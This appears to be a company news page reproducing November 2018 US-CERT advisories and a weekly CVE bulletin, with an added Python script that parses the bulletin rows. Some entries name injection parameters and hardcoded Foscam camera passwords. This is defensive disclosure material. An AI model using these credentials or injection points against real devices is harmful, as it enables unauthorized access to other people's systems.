I.T. News
We follow the latest technology closely.
As we develop our software we will continue to adopt new technologies to improve our products and the customer experience, and we will continue to extend our solutions with new functionality and closer integration with the latest major platforms.

As market share and interest in I.T. virtualization grow, we have built our own virtualization solution, vFleXtor, on proven, up-to-date technology.

Timely information about security topics and threats:

US-CERT: The United States Computer Emergency Readiness Team
  • Original release date: November 13, 2018

    Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

    NCCIC encourages users and administrators to review Microsoft's November 2018 Security Update Summary and Deployment Information and apply the necessary updates.


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 13, 2018

    Adobe has released security updates to address vulnerabilities in Flash Player, Adobe Acrobat and Reader, and Adobe Photoshop CC. An attacker could exploit these vulnerabilities to obtain access to sensitive information.

    NCCIC encourages users and administrators to review Adobe Security Bulletins APSB18-39, APSB18-40, and APSB18-43 and apply the necessary updates.



  • Original release date: November 12, 2018

    The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

    The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

    • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

    • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

    • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

    Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

    The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.
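    The bulletin rows reproduced below arrive with their table cells run together (vendor, product, description, published date, CVSS score and CVE ID with no separators between them). As an added example that is not part of the US-CERT bulletin or of this site's own code, the following Python splits such flattened rows back into fields and buckets each entry with the severity ranges stated above, treating "not yet calculated" as the bulletin's "Severity Not Yet Assigned" group. The three sample rows are copied from this page; the regexes, the Entry record and the function names are this example's own assumptions, in particular that product names in the bulletin are lowercase, which is what separates the product token from the description.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# A complete flattened row: "<vendor> -- <product><Description><YYYY-MM-DD><cvss><CVE-id>".
# Assumption (holds for every row on this page): the product token is lowercase
# letters, digits, '_', '.', '/' or '-', and the description opens with an
# uppercase letter, so the first uppercase letter marks the product/description split.
ROW_RE = re.compile(
    r"^(?P<vendor>.+?) -- (?P<product>[a-z0-9_./-]+)"
    r"(?P<description>[A-Z].*?)"
    r"(?P<published>\d{4}-\d{2}-\d{2})"
    r"(?P<cvss>not yet calculated|\d{1,2}\.\d)"
    r"(?P<cve>CVE-\d{4}-\d{4,})$"
)
# A "vendor -- product" cell whose description was pushed onto a later line (the exiv2 row).
HEAD_RE = re.compile(r"^.+? -- [a-z0-9_./-]+$")
# Source tags listed under a row: MISC, CONFIRM, MLIST, BID, CISCO, SECTRACK, EXPLOIT-DB, ...
SOURCE_RE = re.compile(r"^[A-Z][A-Z-]+$")


@dataclass
class Entry:
    vendor: str
    product: str
    description: str
    published: str
    cvss: str
    cve: str
    sources: List[str] = field(default_factory=list)


def severity(cvss: str) -> str:
    """Bucket a CVSS base score with the ranges the bulletin states above."""
    if cvss == "not yet calculated":
        return "Severity Not Yet Assigned"
    score = float(cvss)
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS base score out of range: {cvss!r}")
    if score >= 7.0:
        return "High"      # 7.0 - 10.0
    if score >= 4.0:
        return "Medium"    # 4.0 - 6.9
    return "Low"           # 0.0 - 3.9


def parse_bulletin(text: str) -> List[Entry]:
    """Turn flattened bulletin lines into Entry records, attaching their source tags."""
    entries: List[Entry] = []
    pending_head = ""  # "vendor -- product" seen without its description yet
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if pending_head:  # re-join a row that extraction split across lines
            line, pending_head = pending_head + line, ""
        row = ROW_RE.match(line)
        if row:
            entries.append(Entry(**row.groupdict()))
            continue
        if HEAD_RE.match(line):
            pending_head = line
            continue
        if SOURCE_RE.match(line) and entries:
            entries[-1].sources.append(line)
            continue
        raise ValueError(f"unrecognised bulletin line: {line[:60]!r}")
    if pending_head:
        raise ValueError(f"row without description: {pending_head!r}")
    return entries


def group_by_severity(entries: List[Entry]) -> Dict[str, List[Entry]]:
    """Group entries into the bulletin's High / Medium / Low / not-yet-assigned tables."""
    groups: Dict[str, List[Entry]] = {}
    for entry in entries:
        groups.setdefault(severity(entry.cvss), []).append(entry)
    return groups


# Sample input copied verbatim from the bulletin on this page (the exiv2 row is the
# one the page shows split across two lines); no new data is introduced here.
SAMPLE = """\
apache -- hiveIn Apache Hive 2.3.3, 3.1.0 and earlier, local resources on HiveServer2 machines are not properly protected against malicious user if ranger, sentry or sql standard authorizer is not in use.2018-11-08not yet calculatedCVE-2018-11777
MISC
axtls -- axtlsIn sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification does not reject excess data after the hash value. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation through fake X.509 certificates. This is a variant of CVE-2006-4340.2018-11-07not yet calculatedCVE-2018-16150
CONFIRM
MLIST
exiv2 -- exiv2

In Exiv2 0.26, Exiv2::IptcParser::decode in iptc.cpp (called from psdimage.cpp in the PSD image reader) may suffer from a denial of service (heap-based buffer over-read) caused by an integer overflow via a crafted PSD image file.2018-11-08not yet calculatedCVE-2018-19107
MISC
MISC
"""

if __name__ == "__main__":
    for sev, group in group_by_severity(parse_bulletin(SAMPLE)).items():
        print(sev)
        for e in group:
            print(f"  {e.cve}  {e.vendor} -- {e.product}  [{', '.join(e.sources)}]")
```

    The description regex is deliberately non-greedy and anchored at the end of the line, so a description that itself mentions an older CVE (the axTLS row ends in "CVE-2006-4340.") is not mistaken for the trailing CVE column. Rows whose product name contained an uppercase letter would need a different split rule; none on this page does.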

     

    High Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    There were no high vulnerabilities recorded this week.

     

    Medium Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    There were no medium vulnerabilities recorded this week.

     

    Low Vulnerabilities

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    There were no low vulnerabilities recorded this week.

     

    Severity Not Yet Assigned

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    apache -- hiveIn Apache Hive 2.3.3, 3.1.0 and earlier, local resources on HiveServer2 machines are not properly protected against malicious user if ranger, sentry or sql standard authorizer is not in use.2018-11-08not yet calculatedCVE-2018-11777
    MISC
    apache -- hiveIn Apache Hive 2.3.3, 3.1.0 and earlier, Hive "EXPLAIN" operation does not check for necessary authorization of involved entities in a query. An unauthorized user can do "EXPLAIN" on arbitrary table or view and expose table metadata and statistics.2018-11-08not yet calculatedCVE-2018-1314
    MISC
    apache -- syncopeAn administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution.2018-11-06not yet calculatedCVE-2018-17186
    MISC
    apache-- supersetVersions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.2018-11-07not yet calculatedCVE-2018-8021
    MISC
    atlassian -- sourcetree_for_macosThere was an argument injection vulnerability in Sourcetree for macOS from version 1.0b2 before version 3.0.0 via Git subrepositories in Mercurial repositories. An attacker with permission to commit to a Mercurial repository linked in Sourcetree for macOS is able to exploit this issue to gain code execution on the system.2018-11-05not yet calculatedCVE-2018-13396
    CONFIRM
    atlassian -- sourcetree_for_windowsThere was an argument injection vulnerability in Sourcetree for Windows from version 0.5.1.0 before version 3.0.0 via Git subrepositories in Mercurial repositories. An attacker with permission to commit to a Mercurial repository linked in Sourcetree for Windows is able to exploit this issue to gain code execution on the system.2018-11-05not yet calculatedCVE-2018-13397
    CONFIRM
    axtls -- axtlsIn sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification blindly trusts the declared lengths in the ASN.1 structure. Consequently, when small public exponents are being used, a remote attacker can generate purposefully crafted signatures (and put them on X.509 certificates) to induce illegal memory access and crash the verifier.2018-11-07not yet calculatedCVE-2018-16149
    CONFIRM
    MLIST
    axtls -- axtlsIn sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification does not reject excess data after the hash value. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation through fake X.509 certificates. This is a variant of CVE-2006-4340.2018-11-07not yet calculatedCVE-2018-16150
    CONFIRM
    MLIST
    axtls -- axtlsIn sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification does not properly verify the ASN.1 metadata. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation through fake X.509 certificates. This is an even more permissive variant of CVE-2006-4790 and CVE-2014-1568.2018-11-07not yet calculatedCVE-2018-16253
    CONFIRM
    MLIST
    bagesoft/bagecms -- bagesoft/bagecmsIn BageCMS 3.1.3, upload/index.php has a CSRF vulnerability that can be used to upload arbitrary files and get server privileges.2018-11-08not yet calculatedCVE-2018-19104
    MISC
    basercms -- basercmsAn issue was discovered in baserCMS before 4.1.4. In the Register New Category feature of the Upload menu, the category name can be used for XSS via the data[UploaderCategory][name] parameter to an admin/uploader/uploader_categories/edit URI.2018-11-05not yet calculatedCVE-2018-18943
    MISC
    MISC
    basercms -- basercmsIn baserCMS before 4.1.4, lib\Baser\Model\ThemeConfig.php allows remote attackers to execute arbitrary PHP code via the admin/theme_configs/form data[ThemeConfig][logo] parameter.2018-11-05not yet calculatedCVE-2018-18942
    MISC
    MISC
    MISC
    brocade_communication_systems -- fabricA Vulnerability in the help command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, gain root access.2018-11-08not yet calculatedCVE-2018-6437
    CONFIRM
    brocade_communication_systems -- fabricA Vulnerability in the firmwaredownload command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, gain root access.2018-11-08not yet calculatedCVE-2018-6436
    CONFIRM
    brocade_communication_systems -- fabricA Vulnerability in the supportsave command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, gain root access.2018-11-08not yet calculatedCVE-2018-6438
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in the Brocade Webtools firmware update section of Brocade Fabric OS before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow remote authenticated attackers to execute arbitrary commands.2018-11-08not yet calculatedCVE-2018-6442
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in Secure Shell implementation of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to provide arbitrary environment variables, and bypass the restricted configuration shell.2018-11-08not yet calculatedCVE-2018-6441
    CONFIRM
    brocade_communication_systems -- fabricA Vulnerability in the secryptocfg command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, and gain root access.2018-11-08not yet calculatedCVE-2018-6435
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in the secryptocfg export command of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to bypass the export file access restrictions and initiate a file copy from the source to a remote system.2018-11-08not yet calculatedCVE-2018-6433
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in the web management interface of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow attackers to intercept or manipulate a user's session ID.2018-11-08not yet calculatedCVE-2018-6434
    CONFIRM
    circontrol -- circarlifeCircontrol CirCarLife all versions prior to 4.3.1, authentication to the device can be bypassed by entering the URL of a specific page.2018-11-02not yet calculatedCVE-2018-17918
    BID
    MISC
    circontrol -- circarlifeCircontrol CirCarLife all versions prior to 4.3.1, the PAP credentials of the device are stored in clear text in a log file that is accessible without authentication.2018-11-02not yet calculatedCVE-2018-17922
    BID
    MISC
    cisco -- content_security_management_applianceA vulnerability in the web-based management interface of Cisco Content Security Management Appliance (SMA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.2018-11-08not yet calculatedCVE-2018-15393
    BID
    CISCO
    cisco -- energy_management_suite_softwareA vulnerability in the web-based management interface of Cisco Energy Management Suite Software could allow an authenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an authenticated user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.2018-11-08not yet calculatedCVE-2018-15445
    BID
    CISCO
    MISC
    cisco -- energy_management_suite_softwareA vulnerability in the web-based user interface of Cisco Energy Management Suite Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by convincing a user of an affected system to import a crafted XML file with malicious entries, which could allow the attacker to read and write files within the affected application.2018-11-08not yet calculatedCVE-2018-15444
    BID
    CISCO
    MISC
    cisco -- firepower_system_softwareA vulnerability in the detection engine of Cisco Firepower System Software could allow an unauthenticated, remote attacker to bypass a configured Intrusion Prevention System (IPS) rule that inspects certain types of TCP traffic. The vulnerability is due to incorrect TCP retransmission handling. An attacker could exploit this vulnerability by sending a crafted TCP connection request through an affected device. A successful exploit could allow the attacker to bypass configured IPS rules and allow uninspected traffic onto the network.2018-11-08not yet calculatedCVE-2018-15443
    BID
    CISCO
    cisco -- immunet_and_advanced_malware_protection_for_endpointsA vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on Microsoft Windows could allow a local attacker to disable the scanning functionality of the product. This could allow executable files to be launched on the system without being analyzed for threats. The vulnerability is due to improper process resource handling. An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or Cisco AMP for Endpoints and executing a malicious file. A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from being protected from further intrusion.2018-11-08not yet calculatedCVE-2018-15437
    BID
    CISCO
    cisco -- integrated_management_controller_supervisorA vulnerability in the web framework code of Cisco Integrated Management Controller (IMC) Supervisor could allow an unauthenticated, remote attacker to execute arbitrary SQL queries. The vulnerability is due to a lack of proper validation of user-supplied input in SQL queries. An attacker could exploit this vulnerability by sending crafted URLs that contain malicious SQL statements to the affected application.2018-11-08not yet calculatedCVE-2018-15447
    BID
    CISCO
    cisco -- meeting_serverA vulnerability in Cisco Meeting Server could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper protections on data that is returned from user meeting requests when the Guest access via ID and passcode option is set to Legacy mode. An attacker could exploit this vulnerability by sending meeting requests to an affected system. A successful exploit could allow the attacker to determine the values of meeting room unique identifiers, possibly allowing the attacker to conduct further exploits.2018-11-08not yet calculatedCVE-2018-15446
    BID
    CISCO
    cisco -- meraki_product_linesA vulnerability in the local status page functionality of the Cisco Meraki MR, MS, MX, Z1, and Z3 product lines could allow an authenticated, remote attacker to modify device configuration files. The vulnerability occurs when handling requests to the local status page. An exploit could allow the attacker to establish an interactive session to the device with elevated privileges. The attacker could then use the elevated privileges to further compromise the device or obtain additional configuration data from the device that is being exploited.2018-11-08not yet calculatedCVE-2018-0284
    CISCO
    cisco -- prime_collaboration_assuranceA vulnerability in the web-based UI of Cisco Prime Collaboration Assurance could allow an authenticated, remote attacker to overwrite files on the file system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using a specific UI input field to provide a custom path location. A successful exploit could allow the attacker to overwrite files on the file system.2018-11-08not yet calculatedCVE-2018-15450
    BID
    CISCO
    cisco -- prime_service_catalogA vulnerability in the web-based management interface of Cisco Prime Service Catalog could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information.2018-11-08not yet calculatedCVE-2018-15451
    BID
    CISCO
    cisco -- registered_envelope_serviceA vulnerability in the user management functions of Cisco Registered Envelope Service could allow an unauthenticated, remote attacker to discover sensitive user information. The attacker could use this information to conduct additional reconnaissance attacks. The vulnerability is due to an insecure configuration that allows improper indexing. An attacker could exploit this vulnerability by using a search engine to look for specific data strings. A successful exploit could allow the attacker to discover certain sensitive information about the application, including usernames.2018-11-08not yet calculatedCVE-2018-15448
    BID
    CISCO
    cisco -- small_business_switchesA vulnerability in the Cisco Small Business Switches software could allow an unauthenticated, remote attacker to bypass the user authentication mechanism of an affected device. The vulnerability exists because under specific circumstances, the affected software enables a privileged user account without notifying administrators of the system. An attacker could exploit this vulnerability by using this account to log in to an affected device and execute commands with full admin rights. Cisco has not released software updates that address this vulnerability. This advisory will be updated with fixed software information once fixed software becomes available. There is a workaround to address this vulnerability.2018-11-08not yet calculatedCVE-2018-15439
    CISCO
    cisco -- stealthwatch_management_consoleA vulnerability in the Stealthwatch Management Console (SMC) of Cisco Stealthwatch Enterprise could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected system. The vulnerability is due to an insecure system configuration. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. An exploit could allow the attacker to gain unauthenticated access, resulting in elevated privileges in the SMC.2018-11-08not yet calculatedCVE-2018-15394
    BID
    CISCO
    cisco -- unity_expressA Java deserialization vulnerability in Cisco Unity Express (CUE) could allow an unauthenticated, remote attacker to execute arbitrary shell commands with the privileges of the root user. The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a malicious serialized Java object to the listening Java Remote Method Invocation (RMI) service. A successful exploit could allow the attacker to execute arbitrary commands on the device with root privileges.2018-11-08not yet calculatedCVE-2018-15381
    CISCO
    cisco -- video_surveillance_media_serverA vulnerability in the web-based management interface of Cisco Video Surveillance Media Server could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the web-based management interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected service. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to cause the web-based management interface to become unreachable, resulting in a DoS condition.2018-11-08not yet calculatedCVE-2018-15449
    BID
    CISCO
    clippercms -- clippercmsClipperCMS 1.3.3 does not have CSRF protection on its kcfinder file upload (enabled by default). This can be used by an attacker to perform actions for an admin (or any user with the file upload capability). With this vulnerability, one can automatically upload files (by default, it allows html, pdf, xml, zip, and many other file types). A file can be accessed publicly under the "/assets/files" directory.2018-11-10not yet calculatedCVE-2018-19135
    MISC
    cloud_foundry -- bits-service_releaseCloud Foundry Bits-Service Release, versions prior to 2.14.0, uses an insecure hashing algorithm to sign URLs. A remote malicious user may obtain a signed URL and extract the signing key, allowing them complete read and write access to the the Bits Service storage.2018-11-09not yet calculatedCVE-2018-15796
    CONFIRM
    dedecms -- dedecmsDedeCMS 5.7 SP2 has SQL Injection via the dede\co_do.php ids parameter.2018-11-07not yet calculatedCVE-2018-19061
    MISC
    MISC
    degrau_publicidade_e_internet_plataforma_de_e-commerce -- busca.aspx.csBusca.aspx.cs in Degrau Publicidade e Internet Plataforma de E-commerce allows SQL Injection via the busca/ URI.2018-11-06not yet calculatedCVE-2018-18963
    MISC
    domainmod -- domainmodDomainMOD through 4.11.01 has XSS via the assets/edit/registrar-account.php raid parameter.2018-11-09not yet calculatedCVE-2018-19136
    MISC
    domainmod -- domainmodDomainMOD through 4.11.01 has XSS via the assets/edit/ip-address.php ipid parameter.2018-11-09not yet calculatedCVE-2018-19137
    MISC
    exiv2 -- exiv2In Exiv2 0.26, Exiv2::PsdImage::readMetadata in psdimage.cpp in the PSD image reader may suffer from a denial of service (infinite loop) caused by an integer overflow via a crafted PSD image file.2018-11-08not yet calculatedCVE-2018-19108
    MISC
    MISC
    exiv2 -- exiv2
     
    In Exiv2 0.26, Exiv2::IptcParser::decode in iptc.cpp (called from psdimage.cpp in the PSD image reader) may suffer from a denial of service (heap-based buffer over-read) caused by an integer overflow via a crafted PSD image file.2018-11-08not yet calculatedCVE-2018-19107
    MISC
    MISC
    flarum -- flarum_coreIn Flarum Core 0.1.0-beta.7.1, a serious leak can get everyone's email address.2018-11-09not yet calculatedCVE-2018-19133
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The exported device configuration is encrypted with the hardcoded Pxift* password in some cases.2018-11-07not yet calculatedCVE-2018-19066
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. They allow remote attackers to execute arbitrary OS commands via shell metacharacters in the usrName parameter of a CGIProxy.fcgi addAccount action.2018-11-07not yet calculatedCVE-2018-19070
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. /mnt/mtd/boot.sh has 0777 permissions, allowing local users to control the commands executed at system start-up.2018-11-07not yet calculatedCVE-2018-19071
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The exported device configuration is encrypted with the hardcoded BpP+2R9*Q password in some cases.2018-11-07not yet calculatedCVE-2018-19065
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The CGIProxy.fcgi?cmd=setTelnetSwitch feature is authorized for the root user with a password of toor.2018-11-07not yet calculatedCVE-2018-19069
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The admin account has a blank password.2018-11-07not yet calculatedCVE-2018-19063
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The firewall has no effect except for blocking port 443 and partially blocking port 88.2018-11-07not yet calculatedCVE-2018-19074
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. There is a hardcoded Ak47@99 password for the factory~ account.2018-11-07not yet calculatedCVE-2018-19067
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. /mnt/mtd/app has 0777 permissions, allowing local users to replace an archive file (within that directory) to control what is extracted to RAM at boot time.2018-11-07not yet calculatedCVE-2018-19072
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The FTP and RTSP services make it easier for attackers to conduct brute-force authentication attacks, because failed-authentication limits apply only to HTTP (not FTP or RTSP).2018-11-07not yet calculatedCVE-2018-19076
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ftpuser1 account has a blank password, which cannot be changed.2018-11-07not yet calculatedCVE-2018-19064
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The firewall feature makes it easier for remote attackers to ascertain credentials and firewall rules because invalid credentials lead to error -2, whereas rule-based blocking leads to error -8.2018-11-07not yet calculatedCVE-2018-19075
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. They allow attackers to execute arbitrary OS commands via shell metacharacters in the modelName, by leveraging /mnt/mtd/app/config/ProductConfig.xml write access.2018-11-07not yet calculatedCVE-2018-19073
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SetDNS method allows remote attackers to conduct stack-based buffer overflow attacks via the IPv4Address field.2018-11-07not yet calculatedCVE-2018-19082
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SetHostname method allows unauthenticated persistent XSS.2018-11-07not yet calculatedCVE-2018-19080
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The CGIProxy.fcgi?cmd=setTelnetSwitch feature is authorized for hidden factory credentials.2018-11-07not yet calculatedCVE-2018-19068
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The response to an ONVIF media GetStreamUri request contains the administrator username and password.2018-11-07not yet calculatedCVE-2018-19078
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SystemReboot method allows unauthenticated reboot.2018-11-07not yet calculatedCVE-2018-19079
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SetDNS method allows remote attackers to execute arbitrary OS commands via the IPv4Address field.2018-11-07not yet calculatedCVE-2018-19081
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. RtspServer allows remote attackers to cause a denial of service (daemon hang or restart) via a negative integer in the RTSP Content-Length header.2018-11-07not yet calculatedCVE-2018-19077
    MISC
    foxit_software -- foxit_reader
        Description: The u3d plugin 9.3.0.10809 (aka plugins\U3DBrowser.fpi) in FoxitReader.exe in Foxit Reader 9.3.0.10826 allows remote attackers to cause a denial of service (out-of-bounds read) or obtain sensitive information via a U3D sample.
        Published: 2018-11-05
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18933 (MISC, MISC)

    fruitywifi -- fruitywifi
        Description: Shell Metacharacter Injection in www/modules/save.php in FruityWifi (aka PatatasFritas/PatataWifi) through 2.4 allows remote attackers to execute arbitrary code with root privileges via a crafted mod_name parameter in a POST request. NOTE: unlike in CVE-2018-17317, the attacker does not need a valid session.
        Published: 2018-11-10
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-19168 (MISC)

    gitea -- gitea
        Description: Gitea before 1.5.4 allows remote code execution because it does not properly validate session IDs. This is related to session ID handling in the go-macaron/session code for Macaron.
        Published: 2018-11-04
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18926 (MISC)

    gogs -- gogs
        Description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
        Published: 2018-11-04
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-18925 (MISC)
    google -- android
        Description: In the SELinux permissions of crash_dump.te, there is a permissions bypass due to a missing restriction. This could lead to a local escalation of privilege, with System privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android-9.0 Android ID: A-110107376.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-9488 (CONFIRM, EXPLOIT-DB)

    google -- android
